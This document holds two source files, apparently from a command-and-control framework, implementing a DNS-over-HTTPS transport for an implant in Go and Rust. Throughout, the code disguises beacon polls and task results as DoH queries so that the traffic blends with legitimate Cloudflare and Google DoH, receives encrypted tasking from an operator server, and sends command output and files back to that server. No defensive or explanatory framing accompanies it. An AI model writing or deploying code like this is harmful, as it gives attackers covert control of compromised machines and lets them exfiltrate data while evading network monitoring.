File: agents/agent-go/transport_doh.go
//go:build !stub

package agent

// DNS-over-HTTPS (DoH) C2 transport — RFC 8484 style.
//
// The agent GETs  <ServerURL>/dns-query?name=<base32(data)>&type=TXT
// where the "name" value is covert beacon data encoded as base32 and
// split into 63-character DNS labels joined by dots, blending with
// legitimate Cloudflare/Google DoH traffic.
//
// Operation prefixes:
//   b.<base32(agentID)>               beacon poll
//   r.<base32(JSON{a:id, d:b64ct})>   result submission
//
// Responses are returned as minimal DNS wireformat TXT records
// (Content-Type: application/dns-message).  Large results (ciphertext
// > dohMaxResultBytes) fall back to a direct HTTP POST to /result/.

import (
	"bytes"
	"encoding/base32"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"strings"
	"time"
)

// dohMaxResultBytes is the ciphertext size above which we fall back to
// a plain HTTP POST rather than squeezing everything into a URL parameter.
const dohMaxResultBytes = 3000

// dohB32 is the base32 codec used by the DoH transport.
var dohB32 = base32.StdEncoding.WithPadding(base32.NoPadding)

// dohEncode base32-encodes data and splits the result into 63-char DNS
// labels joined with dots so the whole thing looks like a domain name.
func dohEncode(data []byte) string {
	encoded := dohB32.EncodeToString(data)
	var labels []string
	for len(encoded) > 63 {
		labels = append(labels, encoded[:63])
		encoded = encoded[63:]
	}
	if len(encoded) > 0 {
		labels = append(labels, encoded)
	}
	return strings.Join(labels, ".")
}

// dohDecode reverses dohEncode: strips dots and base32-decodes.
func dohDecode(name string) ([]byte, error) {
	clean := strings.ReplaceAll(strings.ToUpper(name), ".", "")
	return dohB32.DecodeString(clean)
}

// dohTransport implements the transport interface over DNS-over-HTTPS.
type dohTransport struct {
	client    *http.Client
	serverURL string
	agentID   string
	aesKey    []byte
}

func (d *dohTransport) agentIDStr() string { return d.agentID }

// newDoHTransport creates a DoH transport targeting serverURL.
func newDoHTransport(serverURL string) *dohTransport {
	tr := &http.Transport{}
	if ProxyURL != "" {
		if pu, err := url.Parse(ProxyURL); err == nil {
			tr.Proxy = http.ProxyURL(pu)
		}
	}
	return &dohTransport{
		client:    &http.Client{Transport: tr, Timeout: 30 * time.Second},
		serverURL: serverURL,
	}
}

// dohApplyHeaders sets DoH-appropriate request headers.
func (d *dohTransport) dohApplyHeaders(req *http.Request) {
	req.Header.Set("User-Agent", UserAgent)
	req.Header.Set("Accept", "application/dns-message")
	if HttpHeaders != "" {
		for _, hdr := range strings.Split(HttpHeaders, ";") {
			hdr = strings.TrimSpace(hdr)
			if idx := strings.Index(hdr, ":"); idx > 0 {
				k := strings.TrimSpace(hdr[:idx])
				v := strings.TrimSpace(hdr[idx+1:])
				if k != "" {
					req.Header.Set(k, v)
				}
			}
		}
	}
	if HttpHeadersRemove != "" {
		for _, h := range strings.Split(HttpHeadersRemove, ",") {
			req.Header.Del(strings.TrimSpace(h))
		}
	}
}

// dohGet sends GET /dns-query?name=<name>&type=TXT and returns the
// concatenated TXT character-strings from the DNS wireformat response.
// Returns nil, nil for HTTP 204 (no content / no tasks).
func (d *dohTransport) dohGet(name string) ([]byte, error) {
	u := d.serverURL + "/dns-query?name=" + url.QueryEscape(name) + "&type=TXT"
	req, err := http.NewRequest(http.MethodGet, u, nil)
	if err != nil {
		return nil, err
	}
	d.dohApplyHeaders(req)

	resp, err := d.client.Do(req)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()

	if resp.StatusCode == http.StatusNoContent {
		return nil, nil
	}
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("doh: status %d", resp.StatusCode)
	}
	body, err := io.ReadAll(io.LimitReader(resp.Body, 64*1024))
	if err != nil {
		return nil, err
	}
	return dohParseTXTRecord(body), nil
}

// dohParseTXTRecord extracts and concatenates all TXT character-strings
// from the first TXT answer in a minimal DNS wireformat response.
func dohParseTXTRecord(data []byte) []byte {
	if len(data) < 12 {
		return nil
	}
	ancount := int(data[6])<<8 | int(data[7])
	qdcount := int(data[4])<<8 | int(data[5])
	if ancount == 0 {
		return nil
	}

	pos := 12
	// Skip question section if present.
	for q := 0; q < qdcount && pos < len(data); q++ {
		for pos < len(data) {
			b := data[pos]
			if b == 0 {
				pos++
				break
			}
			if b&0xC0 == 0xC0 {
				pos += 2
				break
			}
			pos += int(b) + 1
		}
		if pos+4 <= len(data) {
			pos += 4 // QTYPE + QCLASS
		}
	}

	// Parse answer records, return the first TXT record's data.
	for i := 0; i < ancount && pos < len(data); i++ {
		// Skip answer NAME (may be a 2-byte pointer or a label sequence).
		if pos >= len(data) {
			break
		}
		if data[pos]&0xC0 == 0xC0 {
			pos += 2
		} else {
			for pos < len(data) {
				if data[pos] == 0 {
					pos++
					break
				}
				pos += int(data[pos]) + 1
			}
		}
		if pos+10 > len(data) {
			break
		}
		rtype := int(data[pos])<<8 | int(data[pos+1])
		pos += 2 // type
		pos += 2 // class
		pos += 4 // ttl
		rdlen := int(data[pos])<<8 | int(data[pos+1])
		pos += 2
		if rdlen == 0 || pos+rdlen > len(data) {
			break
		}
		rdata := data[pos : pos+rdlen]
		pos += rdlen

		if rtype == 16 { // TXT
			// Collect all character-strings: each is 1-byte length + data.
			var txt []byte
			rdpos := 0
			for rdpos < len(rdata) {
				slen := int(rdata[rdpos])
				rdpos++
				if rdpos+slen > len(rdata) {
					txt = append(txt, rdata[rdpos:]...)
					break
				}
				txt = append(txt, rdata[rdpos:rdpos+slen]...)
				rdpos += slen
			}
			return txt
		}
	}
	return nil
}

// register performs agent registration via the standard HTTP /register endpoint.
// DoH is only used for the beacon loop; bootstrapping reuses the HTTP handler.
func (d *dohTransport) register(info sysInfo) error {
	h := newHTTPTransport(d.serverURL)
	if err := h.register(info); err != nil {
		return err
	}
	d.agentID = h.agentID
	d.aesKey = h.aesKey
	if len(d.aesKey) > 0 {
		RegisterScramblerTarget(d.aesKey)
	}
	return nil
}

// beacon polls for pending tasks.
// Sends: GET /dns-query?name=b.<base32(agentID)>&type=TXT
// Response TXT: base64(AES-GCM encrypted beaconResponse JSON)
func (d *dohTransport) beacon() ([]taskWire, error) {
	name := "b." + dohEncode([]byte(d.agentID))
	raw, err := d.dohGet(name)
	if err != nil {
		return nil, err
	}
	if len(raw) == 0 {
		return nil, nil // no tasks
	}
	// raw = base64(AES-GCM sealed beaconResponse JSON)
	ciphertext, err := base64.StdEncoding.DecodeString(string(raw))
	if err != nil {
		return nil, fmt.Errorf("doh beacon: base64: %w", err)
	}
	plaintext, err := open(d.aesKey, ciphertext)
	if err != nil {
		return nil, fmt.Errorf("doh beacon: decrypt: %w", err)
	}
	var br beaconResponse
	if err := json.Unmarshal(plaintext, &br); err != nil {
		return nil, err
	}
	return br.Tasks, nil
}

// sendResult submits a task result via DoH for small payloads, or falls back
// to a direct HTTP POST for large ones.
//
// DoH path: GET /dns-query?name=r.<base32(JSON{a:agentID, d:b64ct})>&type=TXT
// Response TXT: "ack"
func (d *dohTransport) sendResultAdmin(taskID int64, output, errStr string, _ bool) error {
	return d.sendResult(taskID, output, errStr)
}

func (d *dohTransport) sendResult(taskID int64, output, errStr string) error {
	plaintext, err := json.Marshal(resultRequest{TaskID: taskID, Output: output, Error: errStr})
	if err != nil {
		return err
	}
	ciphertext, err := seal(d.aesKey, plaintext)
	if err != nil {
		return err
	}

	if len(ciphertext) > dohMaxResultBytes {
		// Payload too large for a URL parameter — fall back to HTTP POST.
		return d.sendResultHTTP(ciphertext)
	}

	payload, err := json.Marshal(map[string]string{
		"a": d.agentID,
		"d": base64.StdEncoding.EncodeToString(ciphertext),
	})
	if err != nil {
		return err
	}
	_, err = d.dohGet("r." + dohEncode(payload))
	return err
}

// sendResultHTTP falls back to a direct POST to /result/<agentID> when the
// ciphertext is too large to encode in a URL query parameter.
func (d *dohTransport) sendResultHTTP(ciphertext []byte) error {
	req, err := http.NewRequest(http.MethodPost,
		d.serverURL+"/result/"+d.agentID,
		bytes.NewReader(ciphertext))
	if err != nil {
		return err
	}
	req.Header.Set("Content-Type", "application/octet-stream")
	req.Header.Set("User-Agent", UserAgent)
	resp, err := d.client.Do(req)
	if err != nil {
		return err
	}
	resp.Body.Close()
	return nil
}

// uploadFile delegates to the HTTP transport for file uploads.
func (d *dohTransport) uploadFile(taskID int64, filename string, data []byte) error {
	h := &httpTransport{
		client:    d.client,
		serverURL: d.serverURL,
		agentID:   d.agentID,
		aesKey:    d.aesKey,
	}
	return h.uploadFile(taskID, filename, data)
}

// downloadFile delegates to the HTTP transport for file downloads.
func (d *dohTransport) downloadFile(filename string) ([]byte, error) {
	h := &httpTransport{
		client:    d.client,
		serverURL: d.serverURL,
		agentID:   d.agentID,
		aesKey:    d.aesKey,
	}
	return h.downloadFile(filename)
}

File: agents/agent-rust/src/transport_doh.rs
//! DNS-over-HTTPS transport.
//!
//! Registration delegates to HTTP POST /register (sets agent_id + aes_key).
//! Beacon:  GET /dns-query?name=b.<dohEncode(agentID)>&type=TXT
//!          → DNS wireformat → base64(AES-GCM(tasks_json))
//! Result small (≤3000 bytes): GET /dns-query?name=r.<dohEncode(json)>&type=TXT
//! Result large (>3000 bytes): POST /result/<agentID>

use base64::{engine::general_purpose::STANDARD, Engine as _};
use crate::crypto;

const DOH_CHUNK: usize = 63;
const DOH_MAX_RESULT: usize = 3000;

// ── Base32 (RFC 4648, no padding, uppercase for DoH labels) ──────────────────

const B32U: &[u8] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";

fn b32_encode_upper(data: &[u8]) -> String {
    let mut out = Vec::new();
    let mut buf: u64 = 0;
    let mut bits: u32 = 0;
    for &b in data {
        buf = (buf << 8) | b as u64;
        bits += 8;
        while bits >= 5 {
            bits -= 5;
            out.push(B32U[((buf >> bits) & 0x1f) as usize]);
        }
    }
    if bits > 0 {
        out.push(B32U[((buf << (5 - bits)) & 0x1f) as usize]);
    }
    String::from_utf8(out).unwrap_or_default()
}

/// Encode bytes as base32 and split into 63-char labels joined by dots.
pub fn doh_encode(data: &[u8]) -> String {
    let encoded = b32_encode_upper(data);
    let mut labels = Vec::new();
    let mut i = 0;
    while i < encoded.len() {
        let end = (i + DOH_CHUNK).min(encoded.len());
        labels.push(&encoded[i..end]);
        i = end;
    }
    labels.join(".")
}

/// Percent-encode a string for use in a URL query parameter.
/// Only encodes characters not safe in query values.
pub fn url_encode(s: &str) -> String {
    let mut out = String::with_capacity(s.len() * 3);
    for c in s.chars() {
        match c {
            'A'..='Z' | 'a'..='z' | '0'..='9' | '-' | '_' | '~' => out.push(c),
            '.' => out.push_str("%2E"),
            _ => {
                let mut buf = [0u8; 4];
                let enc = c.encode_utf8(&mut buf);
                for b in enc.bytes() {
                    out.push('%');
                    out.push(char::from_digit((b >> 4) as u32, 16).unwrap_or('0').to_ascii_uppercase());
                    out.push(char::from_digit((b & 0xf) as u32, 16).unwrap_or('0').to_ascii_uppercase());
                }
            }
        }
    }
    out
}

// ── DNS wire TXT parser ───────────────────────────────────────────────────────

pub fn parse_doh_txt(data: &[u8]) -> Vec<u8> {
    if data.len() < 12 { return Vec::new(); }
    let ancount = (data[6] as usize) << 8 | data[7] as usize;
    let qdcount = (data[4] as usize) << 8 | data[5] as usize;
    if ancount == 0 { return Vec::new(); }
    let mut pos = 12;
    for _ in 0..qdcount {
        while pos < data.len() {
            if data[pos] == 0 { pos += 1; break; }
            if data[pos] & 0xC0 == 0xC0 { pos += 2; break; }
            pos += data[pos] as usize + 1;
        }
        if pos + 4 <= data.len() { pos += 4; }
    }
    for _ in 0..ancount {
        if pos >= data.len() { break; }
        if data[pos] & 0xC0 == 0xC0 {
            pos += 2;
        } else {
            while pos < data.len() {
                if data[pos] == 0 { pos += 1; break; }
                pos += data[pos] as usize + 1;
            }
        }
        if pos + 10 > data.len() { break; }
        let rtype = (data[pos] as usize) << 8 | data[pos+1] as usize;
        pos += 2; pos += 2; pos += 4;
        let rdlen = (data[pos] as usize) << 8 | data[pos+1] as usize;
        pos += 2;
        if rdlen == 0 || pos + rdlen > data.len() { break; }
        let rdata = &data[pos..pos+rdlen];
        pos += rdlen;
        if rtype == 16 {
            let mut txt = Vec::new();
            let mut rp = 0;
            while rp < rdata.len() {
                let sl = rdata[rp] as usize; rp += 1;
                if rp + sl > rdata.len() { break; }
                txt.extend_from_slice(&rdata[rp..rp+sl]);
                rp += sl;
            }
            if !txt.is_empty() { return txt; }
        }
    }
    Vec::new()
}

// ── DoH beacon/result operations (called from transport.rs) ──────────────────

/// Decrypt a DoH beacon response.
/// raw_txt = DNS wireformat TXT bytes → base64(AES-GCM(tasks_json)).
pub fn decrypt_beacon(raw_txt: &[u8], aes_key: &[u8]) -> Option<Vec<u8>> {
    if raw_txt.is_empty() { return None; }
    let b64_str = String::from_utf8_lossy(raw_txt);
    let ciphertext = STANDARD.decode(b64_str.trim()).ok()?;
    crypto::open(aes_key, &ciphertext)
}

/// Build the result payload JSON and encrypt with AES-GCM.
pub fn make_result_ciphertext(aes_key: &[u8], task_id: i64, output: &str, error: &str) -> Vec<u8> {
    let plain = serde_json::json!({
        "task_id":  task_id,
        "output":   output,
        "error":    error,
        "is_admin": false,
    }).to_string();
    crypto::seal(aes_key, plain.as_bytes())
}

/// Is the ciphertext small enough for URL encoding?
pub fn is_small_result(ct: &[u8]) -> bool {
    ct.len() <= DOH_MAX_RESULT
}

/// Build the DoH query name for a small result submission.
pub fn make_result_query_name(agent_id: &str, ciphertext: &[u8]) -> String {
    let payload = serde_json::json!({
        "a": agent_id,
        "d": STANDARD.encode(ciphertext),
    }).to_string();
    format!("r.{}", doh_encode(payload.as_bytes()))
}
